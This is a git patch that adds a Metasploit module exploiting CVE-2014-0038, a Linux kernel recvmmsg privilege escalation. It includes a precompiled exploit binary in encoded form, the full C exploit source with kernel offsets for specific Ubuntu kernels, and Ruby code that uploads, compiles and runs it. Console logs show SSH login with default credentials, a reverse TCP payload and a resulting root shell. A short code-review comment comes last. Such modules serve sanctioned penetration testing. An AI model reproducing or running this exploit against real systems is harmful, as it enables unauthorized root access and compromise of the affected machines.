From 2dfebe586e9adee4aee004dbb33cdd638147a8e9 Mon Sep 17 00:00:00 2001
From: h00die
Date: Sat, 8 Oct 2016 23:58:09 -0400
Subject: [PATCH] working cve-2014-0038
---
 data/exploits/CVE-2014-0038/recvmmsg | Bin 0 -> 14571 bytes
 .../exploit/linux/local/recvmmsg_priv_esc.md | 133 +++++++
 .../exploits/linux/local/recvmmsg_priv_esc.rb | 354 ++++++++++++++++++
 3 files changed, 487 insertions(+)
 create mode 100644 data/exploits/CVE-2014-0038/recvmmsg
 create mode 100644 documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md
 create mode 100644 modules/exploits/linux/local/recvmmsg_priv_esc.rb
diff --git a/data/exploits/CVE-2014-0038/recvmmsg b/data/exploits/CVE-2014-0038/recvmmsg new file mode 100644 index 0000000000000000000000000000000000000000..fbd9143ffb605593c008603c96392436f23342e2 GIT binary patch literal 14571 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 use auxiliary/scanner/ssh/ssh_login + resource (recvmmsg.rc)> set rhosts 192.168.2.20 + rhosts => 192.168.2.20 + resource (recvmmsg.rc)> set username ubuntu + username => ubuntu + resource (recvmmsg.rc)> set password ubuntu + password => ubuntu + resource (recvmmsg.rc)> exploit + [*] SSH - Starting bruteforce + [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare) Linux ubuntu1304 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux ' + [!] No active DB -- Credential data will not be saved! 
+ [*] Command shell session 1 opened (192.168.2.117:39613 -> 192.168.2.20:22) at 2016-10-08 23:19:48 -0400 + [*] Scanned 1 of 1 hosts (100% complete) + [*] Auxiliary module execution completed + +#### Escalate + + resource (recvmmsg.rc)> use exploit/linux/local/recvmmsg_priv_esc + resource (recvmmsg.rc)> set verbose true + verbose => true + resource (recvmmsg.rc)> set payload linux/x86/shell/reverse_tcp + payload => linux/x86/shell/reverse_tcp + resource (recvmmsg.rc)> set session 1 + session => 1 + resource (recvmmsg.rc)> set lhost 192.168.2.117 + lhost => 192.168.2.117 + resource (recvmmsg.rc)> exploit + [*] Started reverse TCP handler on 192.168.2.117:4444 + [+] Kernel 3.8.0.pre.19.pre.generic is exploitable + [+] gcc is installed + [*] Live compiling exploit on system + [+] Kernel 3.8.0.pre.19.pre.generic is exploitable + [*] Writing to /tmp/4bUIkbrG.c (5950 bytes) + [*] Max line length is 65537 + [*] Writing 5950 bytes in 1 chunks of 20667 bytes (octal-encoded), using printf + [*] Compiling /tmp/4bUIkbrG.c + [*] Writing to /tmp/a0RwAacU (185 bytes) + [*] Max line length is 65537 + [*] Writing 185 bytes in 1 chunks of 560 bytes (octal-encoded), using printf + [*] Exploiting... May take 17min. 
Start time: 2016-10-08 23:20:00 -0400 + [*] Sending stage (36 bytes) to 192.168.2.20 + [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.20:38465) at 2016-10-08 23:32:49 -0400 + + id + uid=0(root) gid=0(root) groups=0(root) + uname -a + Linux ubuntu1304 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux + +### Using pre-compiled binaries on the same system + + resource (recvmmsg.rc)> use exploit/linux/local/recvmmsg_priv_esc + resource (recvmmsg.rc)> set verbose true + verbose => true + resource (recvmmsg.rc)> set payload linux/x86/shell/reverse_tcp + payload => linux/x86/shell/reverse_tcp + resource (recvmmsg.rc)> set session 1 + session => 1 + resource (recvmmsg.rc)> set lhost 192.168.2.117 + lhost => 192.168.2.117 + resource (recvmmsg.rc)> exploit + [*] Started reverse TCP handler on 192.168.2.117:4444 + [+] Kernel 3.8.0.pre.19.pre.generic is exploitable + [-] gcc is not installed. Compiling will fail. + [*] Dropping pre-compiled exploit on system + [+] Kernel 3.8.0.pre.19.pre.generic is exploitable + [*] Writing to /tmp/Yc0xB9oC (14571 bytes) + [*] Max line length is 65537 + [*] Writing 14571 bytes in 1 chunks of 38575 bytes (octal-encoded), using printf + [*] Writing to /tmp/a0RwAacU (185 bytes) + [*] Max line length is 65537 + [*] Writing 185 bytes in 1 chunks of 560 bytes (octal-encoded), using printf + [*] Exploiting... May take 17min. Start time: 2016-10-08 23:42:01 -0400 + [*] Sending stage (36 bytes) to 192.168.2.20 + [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.20:38465) at 2016-10-08 23:54:50 -0400 + [+] Deleted /tmp/Yc0xB9oC + [+] Deleted /tmp/a0RwAacU + + 2689016405 + carERUCEUgdCZfvTyiWuBklsNMqcNhey + true + dPZDicgefmDeBvIpRYKaToiSQmHWQxBe + yGWMZKlCTQskKCZERIXNchDARUIzzBJn + FjFxyOSVHntGpawbQfSzIdRPsbeyOgSq + true + HFPuJArQoYvuxhkoWbAwvdDbNVUjSdUL + vMvWNASOZcfTmStOGnozdJzfTAUWJYzU + VQUKZqzBlQaQJmbtyQSSNudDtINToRhu + whoami + root 
diff --git a/modules/exploits/linux/local/recvmmsg_priv_esc.rb b/modules/exploits/linux/local/recvmmsg_priv_esc.rb
new file mode 100644
index 0000000000..84416d0254
--- /dev/null
+++ b/modules/exploits/linux/local/recvmmsg_priv_esc.rb
@@ -0,0 +1,354 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
+ system call with a crafted timeout pointer parameter to gain root.
+ This exploit has offsets for 3 Ubuntu 13 kernels built in:
+ 3.8.0-19-generic (13.04 default)
+ 3.11.0-12-generic (13.10 default)
+ 3.11.0-15-generic (13.10)
+ This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
+ pointer which starts at 0xff*3 (765 seconds)
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'h00die ', # Module
+ 'rebel' # Discovery
+ ],
+ 'DisclosureDate' => 'Feb 2 2014',
+ 'Platform' => [ 'linux'],
+ 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'Auto', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },
+ 'References' =>
+ [
+ [ 'EDB', '31347'],
+ [ 'EDB', '31346'],
+ [ 'CVE', '2014-0038'],
+ [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+ ], self.class)
+ end
+
+ def check
+ def kernel_vuln?()
+ os_id = cmd_exec('grep ^ID= /etc/os-release')
+ if os_id == 'ID=ubuntu'
+ kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
+ case kernel.release.to_s
+ when '3.11.0'
+ if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')
+ vprint_good("Kernel #{kernel} is exploitable")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
+ return false
+ end
+ when '3.8.0'
+ if kernel == Gem::Version.new('3.8.0-19-generic')
+ vprint_good("Kernel #{kernel} is exploitable")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
+ return false
+ end
+ else
+ print_error("Non-vuln kernel #{kernel}")
+ return false
+ end
+ else
+ print_error("Unknown OS: #{os_id}")
+ return false
+ end
+ end
+
+ if kernel_vuln?()
+ return CheckCode::Appears
+ else
+ return CheckCode::Safe
+ end
+ end
+
+ def exploit
+
+ if check != CheckCode::Appears
+ fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+ end
+
+
+ # direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size
+
+ recvmmsg = %q{
+ /*
+ *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+ recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
+ CVE-2014-0038 / x32 ABI with recvmmsg
+ by rebel @ irc.smashthestack.org
+ -----------------------------------
+ */
+
+ #define _GNU_SOURCE
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+
+ #define __X32_SYSCALL_BIT 0x40000000
+ #undef __NR_recvmmsg
+ #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+ #define VLEN 1
+ #define BUFSIZE 200
+
+ int port;
+
+ struct offset {
+ char *kernel_version;
+ unsigned long dest; // net_sysctl_root + 96
+ unsigned long original_value; // net_ctl_permissions
+ unsigned long prepare_kernel_cred;
+ unsigned long commit_creds;
+ };
+
+ struct offset offsets[] = {
+ {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
+ {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
+ {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
+ {NULL,0,0,0,0}
+ };
+
+ void udp(int b) {
+ int sockfd;
+ struct sockaddr_in servaddr,cliaddr;
+ int s = 0xff+1;
+
+ if(fork() == 0) {
+ while(s > 0) {
+ fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
+ sleep(1);
+ s--;
+ fprintf(stderr,".");
+ }
+
+ sockfd = socket(AF_INET,SOCK_DGRAM,0);
+ bzero(&servaddr,sizeof(servaddr));
+ servaddr.sin_family = AF_INET;
+ servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
+ servaddr.sin_port=htons(port);
+ sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
+ exit(0);
+ }
+
+ }
+
+ void trigger() {
+ open("/proc/sys/net/core/somaxconn",O_RDONLY);
+
+ if(getuid() != 0) {
+ fprintf(stderr,"not root, ya blew it!\n");
+ exit(-1);
+ }
+
+ fprintf(stderr,"w00p w00p!\n");
+ system("/bin/sh -i");
+ }
+
+ typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+ typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+ _commit_creds commit_creds;
+ _prepare_kernel_cred prepare_kernel_cred;
+
+ // thx bliss
+ static int __attribute__((regparm(3)))
+ getroot(void *head, void * table)
+ {
+ commit_creds(prepare_kernel_cred(0));
+ return -1;
+ }
+
+ void __attribute__((regparm(3)))
+ trampoline()
+ {
+ asm("mov $getroot, %rax; call *%rax;");
+ }
+
+ int main(void)
+ {
+ int sockfd, retval, i;
+ struct sockaddr_in sa;
+ struct mmsghdr msgs[VLEN];
+ struct iovec iovecs[VLEN];
+ char buf[BUFSIZE];
+ long mmapped;
+ struct utsname u;
+ struct offset *off = NULL;
+
+ uname(&u);
+
+ for(i=0;offsets[i].kernel_version != NULL;i++) {
+ if(!strcmp(offsets[i].kernel_version,u.release)) {
+ off = &offsets[i];
+ break;
+ }
+ }
+
+ if(!off) {
+ fprintf(stderr,"no offsets for this kernel version..\n");
+ exit(-1);
+ }
+
+ mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
+ mmapped &= 0x000000ffffffffff;
+
+ srand(time(NULL));
+ port = (rand() % 30000)+1500;
+
+ commit_creds = (_commit_creds)off->commit_creds;
+ prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
+
+ mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
+
+ if(mmapped == -1) {
+ perror("mmap()");
+ exit(-1);
+ }
+
+ memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
+
+ memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
+
+ if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
+ perror("mprotect()");
+ exit(-1);
+ }
+
+ sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+ if (sockfd == -1) {
+ perror("socket()");
+ exit(-1);
+ }
+
+ sa.sin_family = AF_INET;
+ sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+ sa.sin_port = htons(port);
+
+ if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+ perror("bind()");
+ exit(-1);
+ }
+
+ memset(msgs, 0, sizeof(msgs));
+
+ iovecs[0].iov_base = &buf;
+ iovecs[0].iov_len = BUFSIZE;
+ msgs[0].msg_hdr.msg_iov = &iovecs[0];
+ msgs[0].msg_hdr.msg_iovlen = 1;
+
+ for(i=0;i < 3 ;i++) {
+ udp(i);
+ retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
+ if(!retval) {
+ fprintf(stderr,"\nrecvmmsg() failed\n");
+ }
+ }
+
+ close(sockfd);
+ fprintf(stderr,"\n");
+ trigger();
+ }
+ }
+
+ filename = rand_text_alphanumeric(8)
+ executable_path = "#{datastore['WritableDir']}/#(unknown)"
+ payloadname = rand_text_alphanumeric(8)
+ payload_path = "#{datastore['WritableDir']}/#{payloadname}"
+
+ def has_prereqs?()
+ gcc = cmd_exec('which gcc')
+ if gcc.include?('gcc')
+ vprint_good('gcc is installed')
+ else
+ print_error('gcc is not installed. Compiling will fail.')
+ end
+ return gcc.include?('gcc')
+ end
+
+ compile = false
+ if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
+ if has_prereqs?()
+ compile = true
+ vprint_status('Live compiling exploit on system')
+ else
+ vprint_status('Dropping pre-compiled exploit on system')
+ end
+ end
+ if check != CheckCode::Appears
+ fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+ end
+
+ def upload_and_chmod(fname,fcontent)
+ print_status "Writing to #{fname} (#{fcontent.size} bytes)"
+ rm_f fname
+ write_file(fname, fcontent)
+ cmd_exec("chmod +x #{fname}")
+ register_file_for_cleanup(fname)
+ end
+
+ if compile
+ recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/,
+ "system(\"#{payload_path}\");")
+ upload_and_chmod("#{executable_path}.c", recvmmsg)
+ vprint_status("Compiling #{executable_path}.c")
+ cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
+ register_file_for_cleanup(executable_path)
+ else
+ path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')
+ fd = ::File.open( path, "rb")
+ recvmmsg = fd.read(fd.stat.size)
+ fd.close
+ upload_and_chmod(executable_path, recvmmsg)
+ # overwrite with the hardcoded variable names in the compiled versions
+ payload_filename = 'a0RwAacU'
+ payload_path = "/tmp/#{payload_filename}"
+ end
+
+ upload_and_chmod(payload_path, generate_payload_exe)
+ stime = Time.now
+ vprint_status("Exploiting... May take 17min. Start time: #{stime}")
+ output = cmd_exec(executable_path)
+ output.each_line { |line| vprint_status(line.chomp) }
+ end
+end
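Review bot: In the pre-compiled branch of `exploit`, `payload_path` is overwritten with the fixed `/tmp/a0RwAacU`, so the `WritableDir` option (whose description promises a location not mounted noexec) is silently ignored there and the payload always lands under a predictable name in a world-writable directory. If the shipped binary must keep that hard-coded path, say so in the option description and warn when the option is not honored, e.g. `print_warning('Pre-compiled binary expects the payload at /tmp/a0RwAacU; WritableDir is ignored')`. `check` is also run twice per `exploit` call (before the C source and again after the compile decision), each run executing `grep` and `uname` on the target, and `kernel_vuln?`, `has_prereqs?` and `upload_and_chmod` are defined with `def` inside method bodies, which re-defines them on the class on every call; hoisting them to `private` methods and dropping the second `check` fixes both. The stated run time is inconsistent: the description says 13 minutes, `WfsDelay` is 780 s and the status line says 17 min, while the C loop waits 3×256 s ≈ 13 min, so `vprint_status("Exploiting... May take 13min. Start time: #{stime}")` matches the handler timeout. `output = cmd_exec(executable_path)` presumably returns on `cmd_exec`'s default timeout long before the run ends, so the `each_line` loop shows only the first seconds of progress; pass an explicit timeout such as `cmd_exec(executable_path, nil, datastore['WfsDelay'])` if that output is wanted, and replace the `::File.open`/`read`/`close` sequence, which has no `ensure`, with `recvmmsg = ::File.binread(path)`.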